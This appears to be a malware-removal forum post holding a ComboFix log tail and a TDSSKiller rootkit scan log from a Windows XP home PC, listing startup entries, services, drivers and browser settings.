"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"= "c:\program files\SUPERAntiSpyware\SASSEH.DLL" [2011-07-19 113024]
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\!SASCORE]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend]
@="Service"
.
[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk]
path=c:\documents and settings\All Users\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
backup=c:\windows\pss\HP Digital Imaging Monitor.lnkCommon Startup
.
[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Startup^Logitech Desktop Messenger.lnk]
backup=c:\windows\pss\Logitech Desktop Messenger.lnkCommon Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KernelFaultCheck]
c:\windows\system32\dumprep 0 -k [X]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Alcmtr]
2004-04-27 02:21 57344 ----a-w- c:\windows\ALCMTR.EXE
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AlcWzrd]
2004-05-03 20:23 2533888 ----a-w- c:\windows\ALCWZRD.EXE
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AppleSyncNotifier]
2008-11-07 20:16 111936 ----a-w- c:\program files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BackupNotify]
2004-01-09 08:34 32768 ----a-w- c:\program files\HP\Digital Imaging\bin\BackupNotify.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ctfmon.exe]
2008-04-14 00:12 15360 ----a-w- c:\windows\system32\ctfmon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DAEMON Tools Lite]
2008-02-13 23:09 486856 ----a-w- c:\program files\DAEMON Tools Lite\daemon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HotKeysCmds]
2004-08-20 21:51 118784 ----a-w- c:\windows\system32\hkcmd.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HP Component Manager]
2003-12-22 22:38 241664 ----a-w- c:\program files\HP\hpcoretech\hpcmpmgr.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HP Software Update]
2007-10-15 03:17 49152 ----a-w- c:\program files\HP\HP Software Update\hpwuSchd2.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HPHmon05]
2003-08-21 10:15 483328 ----a-w- c:\windows\system32\hphmon05.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HPHUPD05]
2003-08-21 10:23 49152 ----a-w- c:\program files\HP\{45B6180B-DCAB-4093-8EE8-6164457517F0}\hphupd05.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\hpqSRMon]
2007-08-22 22:31 80896 ----a-w- c:\program files\HP\Digital Imaging\bin\HpqSRmon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\IgfxTray]
2004-08-20 21:55 155648 ----a-w- c:\windows\system32\igfxtray.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2008-11-20 19:20 290088 ----a-w- c:\program files\iTunes\iTunesHelper.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\MSMSGS]
2008-04-14 00:12 1695232 ----a-w- c:\program files\Messenger\msmsgs.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Recguard]
2004-06-14 16:26 233472 ----a-w- c:\windows\SMINST\Recguard.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SoundMan]
2004-05-03 18:21 67584 ----a-w- c:\windows\SOUNDMAN.EXE
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusOverride"=dword:00000001
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"c:\\Program Files\\Updates from HP\\137903\\Program\\BackWeb-137903.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"c:\\Program Files\\LeapFTP\\LeapFTP.exe"=
"c:\\WINDOWS\\system32\\dpvsetup.exe"=
"c:\\WINDOWS\\system32\\mmc.exe"=
"c:\\Program Files\\Windows Media Player\\wmplayer.exe"=
"c:\\Program Files\\activePDF\\PrimoPDF\\PrimoPDF.exe"=
"c:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"c:\\Program Files\\DNA\\btdna.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hposid01.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqcopy.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqkygrp.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\Unload\\HpqPhUnl.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqste08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqtra08.exe"=
"c:\\Program Files\\IncrediMail\\bin\\ImApp.exe"=
"c:\\Program Files\\iTunes\\iTunes.exe"=
"c:\\WINDOWS\\system32\\sessmgr.exe"=
.
R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [1/14/2013 7:25 PM 738504]
R1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys [1/14/2013 7:26 PM 361032]
R1 eusk2par;EUTRON SmartKey Parallel Driver;c:\windows\system32\drivers\eusk2par.sys [12/23/2009 5:21 PM 30656]
R1 SASDIFSV;SASDIFSV;c:\program files\SUPERAntiSpyware\sasdifsv.sys [7/22/2011 10:27 AM 12880]
R1 SASKUTIL;SASKUTIL;c:\program files\SUPERAntiSpyware\SASKUTIL.SYS [7/12/2011 3:55 PM 67664]
R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [1/14/2013 7:26 PM 21256]
R2 WinDefend;Windows Defender;c:\program files\Windows Defender\MsMpEng.exe [11/3/2006 7:19 PM 13592]
S1 MpKsl08115bda;MpKsl08115bda;\??\c:\windows\system32\MpEngineStore\MpKsl08115bda.sys --> c:\windows\system32\MpEngineStore\MpKsl08115bda.sys [?]
S2 !SASCORE;SAS Core Service; [x]
S2 avg9emc;AVG Free E-mail Scanner; [x]
S2 avg9wd;AVG Free WatchDog; [x]
S2 mrtRate;mrtRate; [x]
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - ASWMBR
*Deregistered* - aswMBR
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12 REG_MULTI_SZ Pml Driver HPZ12 Net Driver HPZ12
hpdevmgmt REG_MULTI_SZ hpqcxs08 hpqddsvc
.
[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2013-01-14 20:20 1606760 ----a-w- c:\program files\Google\Chrome\Application\24.0.1312.52\Installer\setup.exe
.
Contents of the 'Scheduled Tasks' folder
.
2013-01-19 c:\windows\Tasks\avast! Emergency Update.job
- c:\program files\AVAST Software\Avast\AvastEmUpdate.exe [2013-01-15 23:50]
.
2013-01-19 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-01-14 20:11]
.
2013-01-19 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-01-14 20:11]
.
2013-01-19 c:\windows\Tasks\MP Scheduled Scan.job
- c:\program files\Windows Defender\MpCmdRun.exe [2006-11-04 01:20]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.bing.com/
uInternet Settings,ProxyOverride = <local>
uSearchAssistant = hxxp://www.google.com/ie
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
TCP: DhcpNameServer = 192.168.1.1
FF - ProfilePath - c:\documents and settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\
FF - prefs.js: browser.startup.homepage - www.startpage.com
FF - prefs.js: keyword.URL - hxxp://search.mywebstart.net/?sid=10101070100&s=
FF - ExtSQL: 2013-01-14 19:27; [email protected]; c:\program files\AVAST Software\Avast\WebRep\FF
FF - ExtSQL: !HIDDEN! 2009-08-14 02:23; {20a82645-c095-46ed-80e3-08825760534b}; c:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF - user.js: browser.search.order.1 - Search
FF - user.js: keyword.URL - hxxp://search.mywebstart.net/?sid=10101070100&s=
.
- - - - ORPHANS REMOVED - - - -
.
WebBrowser-{CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)
Notify-avgrsstarter - avgrsstx.dll
SafeBoot-07341577.sys
.
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2013-01-18 20:21
Windows 5.1.2600 Service Pack 3 NTFS
.
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{3610eda5-77ef-11d2-8dc5-00c04fa31a66}]
@DACL=(02 0000)
@="Microsoft Disk Quota"
"NoMachinePolicy"=dword:00000000
"NoUserPolicy"=dword:00000001
"NoSlowLink"=dword:00000001
"NoBackgroundPolicy"=dword:00000001
"NoGPOListChanges"=dword:00000001
"PerUserLocalSettings"=dword:00000000
"RequiresSuccessfulRegistry"=dword:00000001
"EnableAsynchronousProcessing"=dword:00000000
"DllName"=expand:"dskquota.dll"
"ProcessGroupPolicy"="ProcessGroupPolicy"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{4CFB60C1-FAA6-47f1-89AA-0B18730C9FD3}]
@DACL=(02 0000)
@="Internet Explorer Zonemapping"
"DllName"="c:\\WINDOWS\\system32\\iedkcs32.dll"
"ProcessGroupPolicy"="ProcessGroupPolicyForZoneMap"
"NoGPOListChanges"=dword:00000001
"RequiresSucessfulRegistry"=dword:00000001
"DisplayName"="@c:\\WINDOWS\\system32\\iedkcs32.dll.mui,-3051"
"RequiresSuccessfulRegistry"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{7B849a69-220F-451E-B3FE-2CB811AF94AE}]
@DACL=(02 0000)
@="Internet Explorer User Accelerators"
"DisplayName"="@c:\\WINDOWS\\system32\\iedkcs32.dll.mui,-3051"
"DllName"="c:\\WINDOWS\\system32\\iedkcs32.dll"
"NoGPOListChanges"=dword:00000001
"ProcessGroupPolicy"="ProcessGroupPolicyForActivities"
"ProcessGroupPolicyEx"="ProcessGroupPolicyForActivitiesEx"
"RequiresSuccessfulRegistry"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}]
@DACL=(02 0000)
"ProcessGroupPolicy"="SceProcessSecurityPolicyGPO"
"GenerateGroupPolicy"="SceGenerateGroupPolicy"
"ExtensionRsopPlanningDebugLevel"=dword:00000001
"ProcessGroupPolicyEx"="SceProcessSecurityPolicyGPOEx"
"ExtensionDebugLevel"=dword:00000001
"DllName"=expand:"scecli.dll"
@="Security"
"NoUserPolicy"=dword:00000001
"NoGPOListChanges"=dword:00000001
"EnableAsynchronousProcessing"=dword:00000001
"MaxNoGPOListChangesInterval"=dword:000003c0
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{A2E30F80-D7DE-11d2-BBDE-00C04F86AE3B}]
@DACL=(02 0000)
"ProcessGroupPolicyEx"="ProcessGroupPolicyEx"
"GenerateGroupPolicy"="GenerateGroupPolicy"
"ProcessGroupPolicy"="ProcessGroupPolicy"
"DllName"="c:\\WINDOWS\\system32\\iedkcs32.dll"
@="Internet Explorer Branding"
"NoSlowLink"=dword:00000001
"NoBackgroundPolicy"=dword:00000000
"NoGPOListChanges"=dword:00000001
"NoMachinePolicy"=dword:00000001
"DisplayName"="@c:\\WINDOWS\\system32\\iedkcs32.dll.mui,-3014"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}]
@DACL=(02 0000)
"ProcessGroupPolicy"="SceProcessEFSRecoveryGPO"
"DllName"=expand:"scecli.dll"
@="EFS recovery"
"NoUserPolicy"=dword:00000001
"NoGPOListChanges"=dword:00000001
"RequiresSuccessfulRegistry"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{B587E2B1-4D59-4e7e-AED9-22B9DF11D053}]
@DACL=(02 0000)
@="802.3 Group Policy"
"DisplayName"=expand:"@dot3gpclnt.dll,-100"
"ProcessGroupPolicyEx"="ProcessLANPolicyEx"
"GenerateGroupPolicy"="GenerateLANPolicy"
"DllName"=expand:"dot3gpclnt.dll"
"NoUserPolicy"=dword:00000001
"NoGPOListChanges"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{C631DF4C-088F-4156-B058-4375F0853CD8}]
@DACL=(02 0000)
@="Microsoft Offline Files"
"DllName"=expand:"%SystemRoot%\\System32\\cscui.dll"
"EnableAsynchronousProcessing"=dword:00000000
"NoBackgroundPolicy"=dword:00000000
"NoGPOListChanges"=dword:00000000
"NoMachinePolicy"=dword:00000000
"NoSlowLink"=dword:00000000
"NoUserPolicy"=dword:00000001
"PerUserLocalSettings"=dword:00000000
"ProcessGroupPolicy"="ProcessGroupPolicy"
"RequiresSuccessfulRegistry"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{c6dc5466-785a-11d2-84d0-00c04fb169f7}]
@DACL=(02 0000)
@="Software Installation"
"DllName"=expand:"appmgmts.dll"
"ProcessGroupPolicyEx"="ProcessGroupPolicyObjectsEx"
"GenerateGroupPolicy"="GenerateGroupPolicy"
"NoBackgroundPolicy"=dword:00000000
"RequiresSucessfulRegistry"=dword:00000000
"NoSlowLink"=dword:00000001
"PerUserLocalSettings"=dword:00000001
"EventSources"=multi:"(Application Management,Application)\00(MsiInstaller,Application)\00\00"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{CF7639F3-ABA2-41DB-97F2-81E2C5DBFC5D}]
@DACL=(02 0000)
@="Internet Explorer Machine Accelerators"
"DisplayName"="@c:\\WINDOWS\\system32\\iedkcs32.dll.mui,-3051"
"DllName"="c:\\WINDOWS\\system32\\iedkcs32.dll"
"NoGPOListChanges"=dword:00000001
"ProcessGroupPolicy"="ProcessGroupPolicyForActivities"
"ProcessGroupPolicyEx"="ProcessGroupPolicyForActivitiesEx"
"RequiresSuccessfulRegistry"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
@DACL=(02 0000)
"HelpAssistant"=dword:00000000
"TsInternetUser"=dword:00000000
"SQLAgentCmdExec"=dword:00000000
"NetShowServices"=dword:00000000
"IWAM_"=dword:00010000
"IUSR_"=dword:00010000
"VUSR_"=dword:00010000
"ASPNET"=dword:00000000
.
Completion time: 2013-01-18 20:23:59
ComboFix-quarantined-files.txt 2013-01-19 02:23
.
Pre-Run: 80,107,855,872 bytes free
Post-Run: 80,564,518,912 bytes free
.
- - End Of File - - CC80B0E3F9FBCED46643A137F67B2FA6

#6
goodseed

20:30:58.0250 1300 TDSS rootkit removing tool 2.8.15.0 Oct 31 2012 21:47:35
20:30:58.0906 1300 ============================================================
20:30:58.0906 1300 Current date / time: 2013/01/18 20:30:58.0906
20:30:58.0921 1300 SystemInfo:
20:30:58.0921 1300
20:30:58.0921 1300 OS Version: 5.1.2600 ServicePack: 3.0
20:30:58.0921 1300 Product type: Workstation
20:30:58.0921 1300 ComputerName: YOUR-46E94OWX6A
20:30:58.0921 1300 UserName: Owner
20:30:58.0921 1300 Windows directory: C:\WINDOWS
20:30:58.0921 1300 System windows directory: C:\WINDOWS
20:30:58.0921 1300 Processor architecture: Intel x86
20:30:58.0921 1300 Number of processors: 2
20:30:58.0921 1300 Page size: 0x1000
20:30:58.0921 1300 Boot type: Normal boot
20:30:58.0921 1300 ============================================================
20:30:59.0671 1300 Drive \Device\Harddisk0\DR0 - Size: 0x25433D6000 (149.05 Gb), SectorSize: 0x200, Cylinders: 0x50C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xF0, Type 'K0', Flags 0x00000054
20:30:59.0921 1300 ============================================================
20:30:59.0921 1300 \Device\Harddisk0\DR0:
20:30:59.0921 1300 MBR partitions:
20:30:59.0921 1300 \Device\Harddisk0\DR0\Partition1: MBR, Type 0xB, StartLBA 0x3F, BlocksNum 0x9B7FE1
20:30:59.0921 1300 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x9B8020, BlocksNum 0x1205CBE0
20:30:59.0921 1300 ============================================================
20:30:59.0968 1300 C: <-> \Device\Harddisk0\DR0\Partition2
20:30:59.0968 1300 D: <-> \Device\Harddisk0\DR0\Partition1
20:30:59.0984 1300 ============================================================
20:30:59.0984 1300 Initialize success
20:30:59.0984 1300 ============================================================
20:31:19.0718 2536 ============================================================
20:31:19.0718 2536 Scan started
20:31:19.0718 2536 Mode: Manual;
20:31:19.0718 2536 ============================================================
20:31:20.0531 2536 ================ Scan system memory ========================
20:31:20.0531 2536 System memory - ok
20:31:20.0531 2536 ================ Scan services =============================
20:31:20.0703 2536 [ 149A8F7ADF9742554DC323E290551E3E ] Aavmker4 C:\WINDOWS\system32\drivers\Aavmker4.sys
20:31:20.0703 2536 Aavmker4 - ok
20:31:20.0703 2536 Abiosdsk - ok
20:31:20.0718 2536 abp480n5 - ok
20:31:20.0765 2536 [ 8FD99680A539792A30E97944FDAECF17 ] ACPI C:\WINDOWS\system32\DRIVERS\ACPI.sys
20:31:20.0765 2536 ACPI - ok
20:31:20.0796 2536 [ 9859C0F6936E723E4892D7141B1327D5 ] ACPIEC C:\WINDOWS\system32\drivers\ACPIEC.sys
20:31:20.0796 2536 ACPIEC - ok
20:31:20.0812 2536 adpu160m - ok
20:31:20.0859 2536 [ 8BED39E3C35D6A489438B8141717A557 ] aec C:\WINDOWS\system32\drivers\aec.sys
20:31:20.0859 2536 aec - ok
20:31:20.0937 2536 [ 1E44BC1E83D8FD2305F8D452DB109CF9 ] AFD C:\WINDOWS\System32\drivers\afd.sys
20:31:20.0937 2536 AFD - ok
20:31:20.0953 2536 [ C685CC27A2E637F0DCB5A45E67CC6F74 ] AFS2K C:\WINDOWS\system32\drivers\AFS2K.sys
20:31:20.0953 2536 AFS2K - ok
20:31:21.0031 2536 [ 593AEFC67283D409F34CC1245D00A509 ] AgereSoftModem C:\WINDOWS\system32\DRIVERS\AGRSM.sys
20:31:21.0093 2536 AgereSoftModem - ok
20:31:21.0109 2536 Aha154x - ok
20:31:21.0125 2536 aic78u2 - ok
20:31:21.0125 2536 aic78xx - ok
20:31:21.0156 2536 [ A9A3DAA780CA6C9671A19D52456705B4 ] Alerter C:\WINDOWS\system32\alrsvc.dll
20:31:21.0156 2536 Alerter - ok
20:31:21.0187 2536 [ 8C515081584A38AA007909CD02020B3D ] ALG C:\WINDOWS\System32\alg.exe
20:31:21.0187 2536 ALG - ok
20:31:21.0203 2536 AliIde - ok
20:31:21.0234 2536 [ 8FCE268CDBDD83B23419D1F35F42C7B1 ] AmdK7 C:\WINDOWS\system32\DRIVERS\amdk7.sys
20:31:21.0234 2536 AmdK7 - ok
20:31:21.0234 2536 amsint - ok
20:31:21.0250 2536 AppMgmt - ok
20:31:21.0265 2536 [ B5B8A80875C1DEDEDA8B02765642C32F ] Arp1394 C:\WINDOWS\system32\DRIVERS\arp1394.sys
20:31:21.0265 2536 Arp1394 - ok
20:31:21.0265 2536 asc - ok
20:31:21.0281 2536 asc3350p - ok
20:31:21.0296 2536 asc3550 - ok
20:31:21.0437 2536 [ 0E5E4957549056E2BF2C49F4F6B601AD ] aspnet_state C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
20:31:21.0453 2536 aspnet_state - ok
20:31:21.0484 2536 [ DE6ED95AEF259979B2830450072A627B ] aswFsBlk C:\WINDOWS\system32\drivers\aswFsBlk.sys
20:31:21.0484 2536 aswFsBlk - ok
20:31:21.0515 2536 [ 84F0BE324EE111338589F448C3E8BAB2 ] aswMon2 C:\WINDOWS\system32\drivers\aswMon2.sys
20:31:21.0515 2536 aswMon2 - ok
20:31:21.0562 2536 [ 7C9F0A2AB17D52261A9252A2EB320884 ] AswRdr C:\WINDOWS\system32\drivers\AswRdr.sys
20:31:21.0562 2536 AswRdr - ok
20:31:21.0593 2536 [ B32E9AD44A1DBB3E8095E80F8DF32B03 ] aswSnx C:\WINDOWS\system32\drivers\aswSnx.sys
20:31:21.0625 2536 aswSnx - ok
20:31:21.0640 2536 [ 67B558895695545FB0568B7541F3BCA7 ] aswSP C:\WINDOWS\system32\drivers\aswSP.sys
20:31:21.0656 2536 aswSP - ok
20:31:21.0671 2536 [ E3E73B2B73A4DFADFDDF557192C4B08A ] aswTdi C:\WINDOWS\system32\drivers\aswTdi.sys
20:31:21.0671 2536 aswTdi - ok
20:31:21.0718 2536 [ B153AFFAC761E7F5FCFA822B9C4E97BC ] AsyncMac C:\WINDOWS\system32\DRIVERS\asyncmac.sys
20:31:21.0718 2536 AsyncMac - ok
20:31:21.0718 2536 [ 9F3A2F5AA6875C72BF062C712CFA2674 ] atapi C:\WINDOWS\system32\DRIVERS\atapi.sys
20:31:21.0718 2536 atapi - ok
20:31:21.0734 2536 Atdisk - ok
20:31:21.0765 2536 [ 9916C1225104BA14794209CFA8012159 ] Atmarpc C:\WINDOWS\system32\DRIVERS\atmarpc.sys
20:31:21.0765 2536 Atmarpc - ok
20:31:21.0796 2536 [ DEF7A7882BEC100FE0B2CE2549188F9D ] AudioSrv C:\WINDOWS\System32\audiosrv.dll
20:31:21.0796 2536 AudioSrv - ok
20:31:21.0843 2536 [ D9F724AA26C010A217C97606B160ED68 ] audstub C:\WINDOWS\system32\DRIVERS\audstub.sys
20:31:21.0843 2536 audstub - ok
20:31:21.0921 2536 [ 8FA553E9AE69808D99C164733A0F9590 ] avast! Antivirus C:\Program Files\AVAST Software\Avast\AvastSvc.exe
20:31:21.0937 2536 avast! Antivirus - ok
20:31:21.0984 2536 [ DA1F27D85E0D1525F6621372E7B685E9 ] Beep C:\WINDOWS\system32\drivers\Beep.sys
20:31:22.0000 2536 Beep - ok
20:31:22.0046 2536 [ 574738F61FCA2935F5265DC4E5691314 ] BITS C:\WINDOWS\system32\qmgr.dll
20:31:22.0093 2536 BITS - ok
20:31:22.0156 2536 [ 3F56903E124E820AEECE6D471583C6C1 ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
20:31:22.0156 2536 Bonjour Service - ok
20:31:22.0187 2536 [ CFD4E51402DA9838B5A04AE680AF54A0 ] Browser C:\WINDOWS\System32\browser.dll
20:31:22.0203 2536 Browser - ok
20:31:22.0234 2536 [ 248DFA5762DDE38DFDDBBD44149E9D7A ] BVRPMPR5 C:\WINDOWS\system32\drivers\BVRPMPR5.SYS
20:31:22.0234 2536 BVRPMPR5 - ok
20:31:22.0390 2536 catchme - ok
20:31:22.0421 2536 [ 90A673FC8E12A79AFBED2576F6A7AAF9 ] cbidf2k C:\WINDOWS\system32\drivers\cbidf2k.sys
20:31:22.0421 2536 cbidf2k - ok
20:31:22.0421 2536 cd20xrnt - ok
20:31:22.0453 2536 [ C1B486A7658353D33A10CC15211A873B ] Cdaudio C:\WINDOWS\system32\drivers\Cdaudio.sys
20:31:22.0453 2536 Cdaudio - ok
20:31:22.0500 2536 [ C885B02847F5D2FD45A24E219ED93B32 ] Cdfs C:\WINDOWS\system32\drivers\Cdfs.sys
20:31:22.0500 2536 Cdfs - ok
20:31:22.0515 2536 [ 1F4260CC5B42272D71F79E570A27A4FE ] Cdrom C:\WINDOWS\system32\DRIVERS\cdrom.sys
20:31:22.0531 2536 Cdrom - ok
20:31:22.0531 2536 Changer - ok
20:31:22.0562 2536 [ 1CFE720EB8D93A7158A4EBC3AB178BDE ] CiSvc C:\WINDOWS\system32\cisvc.exe
20:31:22.0562 2536 CiSvc - ok
20:31:22.0578 2536 [ 34CBE729F38138217F9C80212A2A0C82 ] ClipSrv C:\WINDOWS\system32\clipsrv.exe
20:31:22.0593 2536 ClipSrv - ok
20:31:22.0625 2536 [ D87ACAED61E417BBA546CED5E7E36D9C ] clr_optimization_v2.0.50727_32 C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
20:31:22.0781 2536 clr_optimization_v2.0.50727_32 - ok
20:31:22.0796 2536 CmdIde - ok
20:31:22.0812 2536 COMSysApp - ok
20:31:22.0828 2536 Cpqarray - ok
20:31:22.0890 2536 [ 3D4E199942E29207970E04315D02AD3B ] CryptSvc C:\WINDOWS\System32\cryptsvc.dll
20:31:22.0890 2536 CryptSvc - ok
20:31:22.0890 2536 dac2w2k - ok
20:31:22.0906 2536 dac960nt - ok
20:31:22.0968 2536 [ 6B27A5C03DFB94B4245739065431322C ] DcomLaunch C:\WINDOWS\system32\rpcss.dll
20:31:22.0984 2536 DcomLaunch - ok
20:31:23.0031 2536 [ 5E38D7684A49CACFB752B046357E0589 ] Dhcp C:\WINDOWS\System32\dhcpcsvc.dll
20:31:23.0031 2536 Dhcp - ok
20:31:23.0078 2536 [ 044452051F3E02E7963599FC8F4F3E25 ] Disk C:\WINDOWS\system32\DRIVERS\disk.sys
20:31:23.0078 2536 Disk - ok
20:31:23.0093 2536 dmadmin - ok
20:31:23.0125 2536 [ D992FE1274BDE0F84AD826ACAE022A41 ] dmboot C:\WINDOWS\system32\drivers\dmboot.sys
20:31:23.0156 2536 dmboot - ok
20:31:23.0187 2536 [ 7C824CF7BBDE77D95C08005717A95F6F ] dmio C:\WINDOWS\system32\drivers\dmio.sys
20:31:23.0187 2536 dmio - ok
20:31:23.0203 2536 [ E9317282A63CA4D188C0DF5E09C6AC5F ] dmload C:\WINDOWS\system32\drivers\dmload.sys
20:31:23.0203 2536 dmload - ok
20:31:23.0234 2536 [ 57EDEC2E5F59F0335E92F35184BC8631 ] dmserver C:\WINDOWS\System32\dmserver.dll
20:31:23.0234 2536 dmserver - ok
20:31:23.0265 2536 [ 8A208DFCF89792A484E76C40E5F50B45 ] DMusic C:\WINDOWS\system32\drivers\DMusic.sys
20:31:23.0265 2536 DMusic - ok
20:31:23.0312 2536 [ 5F7E24FA9EAB896051FFB87F840730D2 ] Dnscache C:\WINDOWS\System32\dnsrslvr.dll
20:31:23.0312 2536 Dnscache - ok
20:31:23.0343 2536 [ 0F0F6E687E5E15579EF4DA8DD6945814 ] Dot3svc C:\WINDOWS\System32\dot3svc.dll
20:31:23.0359 2536 Dot3svc - ok
20:31:23.0359 2536 dpti2o - ok
20:31:23.0375 2536 [ 8F5FCFF8E8848AFAC920905FBD9D33C8 ] drmkaud C:\WINDOWS\system32\drivers\drmkaud.sys
20:31:23.0375 2536 drmkaud - ok
20:31:23.0406 2536 [ 2187855A7703ADEF0CEF9EE4285182CC ] EapHost C:\WINDOWS\System32\eapsvc.dll
20:31:23.0406 2536 EapHost - ok
20:31:23.0453 2536 [ BC93B4A066477954555966D77FEC9ECB ] ERSvc C:\WINDOWS\System32\ersvc.dll
20:31:23.0453 2536 ERSvc - ok
20:31:23.0500 2536 [ 38008FAAA9632C2EF8E98BF1614D0527 ] eusk2par C:\WINDOWS\system32\Drivers\eusk2par.sys
20:31:23.0500 2536 eusk2par - ok
20:31:23.0531 2536 [ 65DF52F5B8B6E9BBD183505225C37315 ] Eventlog C:\WINDOWS\system32\services.exe
20:31:23.0546 2536 Eventlog - ok
20:31:23.0578 2536 [ D4991D98F2DB73C60D042F1AEF79EFAE ] EventSystem C:\WINDOWS\System32\es.dll
20:31:23.0593 2536 EventSystem - ok
20:31:23.0640 2536 [ 38D332A6D56AF32635675F132548343E ] Fastfat C:\WINDOWS\system32\drivers\Fastfat.sys
20:31:23.0640 2536 Fastfat - ok
20:31:23.0671 2536 [ 1E580770BDECE924494B368AC980749E ] fasttx2k C:\WINDOWS\system32\DRIVERS\fasttx2k.sys
20:31:23.0671 2536 fasttx2k - ok
20:31:23.0718 2536 [ 99BC0B50F511924348BE19C7C7313BBF ] FastUserSwitchingCompatibility C:\WINDOWS\System32\shsvcs.dll
20:31:23.0734 2536 FastUserSwitchingCompatibility - ok
20:31:23.0765 2536 [ E97D6A8684466DF94FF3BC24FB787A07 ] Fax C:\WINDOWS\system32\fxssvc.exe
20:31:23.0765 2536 Fax - ok
